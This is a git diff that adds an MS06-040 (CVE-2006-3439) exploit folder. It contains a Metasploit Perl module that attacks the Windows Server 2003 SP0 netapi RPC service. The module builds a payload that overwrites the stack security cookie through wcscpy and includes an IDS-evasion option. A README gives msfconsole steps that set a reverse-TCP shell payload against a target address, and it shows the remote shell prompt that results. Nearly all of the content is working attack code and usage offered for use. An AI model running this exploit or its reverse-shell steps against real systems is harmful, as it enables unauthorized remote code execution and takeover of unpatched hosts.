diff --git a/MS06-040/2355.pm b/MS06-040/2355.pm new file mode 100644 index 0000000..f86183e --- /dev/null +++ b/MS06-040/2355.pm @@ -0,0 +1,233 @@ +######################################################################### +# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0) +# +# Author: Trirat Puttaraksa (Kira) +# +# http://sf-freedom.blogspot.com +# +# For educational purpose only +# +# Note: This exploit is developed because of my question "Is it exploitable +# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows +# Server 2003 SP1 is not exploitable because they are compiled with /GS, but +# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there +# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not +# exploitable ? There is Stack Protection Windows Server 2003, is this the +# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ? +# +# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him +# ^-^) and work on it. The problem is the Stack Protection "security cookie +# checking". Because wcscpy() method allow me to write to any memory location +# that are marked writable, I decide to write to the location at "security +# cookie" is stored and it works !!! I will describe more implementation details +# in my blog in few days ^-^ +# +# This exploit tested on Windows Server 2003 SP0 build 3790 and successful +# exploit 2003 machine in my environment - all patch before MS06-040 +# (KB921883). It's quite reliable but not 100%. There is the possibility that +# the exploit will fail and the target system process crash. Because I have +# only one testbase system, I couldn't confirm this exploit will work on +# your environment. However feel free to e-mail to me. +# +# Credits: H D Moore +######################################################################### + +package Msf::Exploit::netapi_win2003; +use base "Msf::Exploit"; +use strict; + +use Pex::DCERPC; +use Pex::NDR; + +my $advanced = { + 'FragSize' => [ 256, 'The DCERPC fragment size' ], + 'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ], + 'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ], + }; + +my $info = { + 'Name' => 'MSO6-040 Windows Server 2003 Target', + 'Version' => '', + 'Authors' => + [ + 'Trirat Puttaraksa (Kira) ', + ], + + 'Arch' => ['x86'], + 'OS' => [ 'win32', 'win2003' ], + 'Priv' => 1, + + 'AutoOpts' => { 'EXITFUNC' => 'thread' }, + + 'UserOpts' => + { + 'RHOST' => [ 1, 'ADDR', 'The target address' ], + + # SMB connection options + 'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ], + 'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ], + 'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ], + }, + + 'Payload' => + { + # Technically we can use more space than this, but by limiting it + # to 370 bytes we can use the same request for all Windows SPs. + 'Space' => 370, + + 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", + 'Keys' => ['+ws2ord'], + + # sub esp, 4097 + inc esp makes stack happy + 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", + }, + + 'Description' => Pex::Text::Freeform( + qq{ + This exploit modified from netapi_ms06_040.pm (Metasploit). + While netapi_ms06_040 of metasploit works on Windows 2000 + SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on + Windows Server 2003 SP0. + } + ), + + 'Refs' => + [ + [ 'BID', '19409' ], + [ 'CVE', '2006-3439' ], + [ 'MSB', 'MS06-040' ], + ], + + 'DefaultTarget' => 0, + 'Targets' => + [ + [ '(wcscpy) Windows Server 2003 SP0', 612], + ], + + 'Keys' => ['srvsvc'], + + 'DisclosureDate' => '', + }; + +sub new { + my ($class) = @_; + my $self = + $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ ); + return ($self); +} + +sub Exploit { + my ($self) = @_; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target_name = '*SMBSERVER'; + + my $FragSize = $self->GetVar('FragSize') || 256; + my $target = $self->Targets->[$target_idx]; + + if (!$self->InitNops(128)) { + $self->PrintLine("Could not initialize the nop module"); + return; + } + + my ( $res, $rpc ); + + my $pipe = '\BROWSER'; + my $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188'; + my $version = '3.0'; + + my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe ); + + my $dce = Pex::DCERPC->new( + 'handle' => $handle, + 'username' => $self->GetVar('SMBUSER'), + 'password' => $self->GetVar('SMBPASS'), + 'domain' => $self->GetVar('SMBDOM'), + 'fragsize' => $self->GetVar('FragSize'), + 'bindevasion' => $self->GetVar('BindEvasion'), + 'directsmb' => $self->GetVar('DirectSMB'), + ); + + if ( !$dce ) { + $self->PrintLine("[*] Could not bind to $handle"); + return; + } + + my $smb = $dce->{'_handles'}{$handle}{'connection'}; + + if (! $smb) { + $self->PrintLine("[*] Could not establish SMB session"); + return; + } + + my $stub; + + # + # Use the wcscpy() method on Windows Server 2003 SP0 + # + if ($target->[0] =~ /2003/) { + + my $path = + $shellcode. + + # Padding + Pex::Text::AlphaNumText($target->[1] - length($shellcode)). + Pex::Text::AlphaNumText(32). + substr($shellcode, 0, 4). # cookie + Pex::Text::AlphaNumText(4). + # return address == address that store security cookie + ("\xec\xc1\xc8\x71") . + Pex::Text::AlphaNumText(8). + + ("\xec\xc1\xc8\x71" x 2) . + Pex::Text::AlphaNumText(36). + + # Terminate + "\x00\x00"; + + + # Package that into a stub + $stub = + Pex::NDR::Long(int(rand(0xffffffff))). + Pex::NDR::UnicodeConformantVaryingString(''). + Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path). + Pex::NDR::Long(int(rand(250)+1)). + Pex::NDR::UnicodeConformantVaryingString(''). + Pex::NDR::Long(int(rand(250)+1)). + Pex::NDR::Long(0); + } + else { + $self->PrintLine("This target is not currently supported"); + return; + } + + + $self->PrintLine("[*] Sending request..."); + + # Function 0x1f is not the only way to exploit this :-) + my @response = $dce->request( $handle, 0x1f, $stub ); + + if ( length($dce->{'response'}->{'StubData'}) > 0) { + $self->PrintLine("[*] The server rejected it, trying again..."); + @response = $dce->request( $handle, 0x1f, $stub ); + } + + if ( length($dce->{'response'}->{'StubData'}) > 0) { + $self->PrintLine("[*] Exploit Failed"); + } + + if (@response) { + $self->PrintLine('[*] RPC server responded with:'); + foreach my $line (@response) { + $self->PrintLine( '[*] ' . $line ); + } + } + + return; +} + +1; + +# milw0rm.com [2006-09-13] diff --git a/MS06-040/README.md b/MS06-040/README.md new file mode 100644 index 0000000..1ad6346 --- /dev/null +++ b/MS06-040/README.md @@ -0,0 +1,32 @@ +# MS06-040 + +MS06-040 + +Vulnerability reference: + * [MS06-040](https://technet.microsoft.com/library/security/ms06-040) + * [CVE-2006-3439](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439) + * [exp-db](https://www.exploit-db.com/exploits/2355/) + +## msf Usage +* [YouTube-ms06-040](https://www.youtube.com/watch?v=AsZ8qTr7IoE) +``` +msf > search ms06_040 +msf > use exploit/windows/smb/ms06_040_netapi +msf exploit(ms06_040_netapi) > show payloads +msf exploit(ms06_040_netapi) > set payload windows/shell/reverse_tcp +msf exploit(ms06_040_netapi) > set RHOST 192.1.80.2 +msf exploit(ms06_040_netapi) > set LHOST 192.1.80.152 +msf exploit(ms06_040_netapi) > set TARGET 0TARGET -> 0 +msf exploit(ms06_040_netapi) > exploit +session -i 1 + +Microsoft Windows 2000 [Version 5.00.2195] +(C) 版权所有 1985-2000 Microsoft Corp. +C:\WINNT\system32> +``` + +## References +* [深入浅出MS06-040](http://blog.csdn.net/iiprogram/article/details/2820149) +* [How to Exploit MS06-040](https://www.linickx.com/how-to-exploit-ms06-040) + + diff --git a/MS06-040/ms06040.rar b/MS06-040/ms06040.rar new file mode 100644 index 0000000..f7017c7 Binary files /dev/null and b/MS06-040/ms06040.rar differ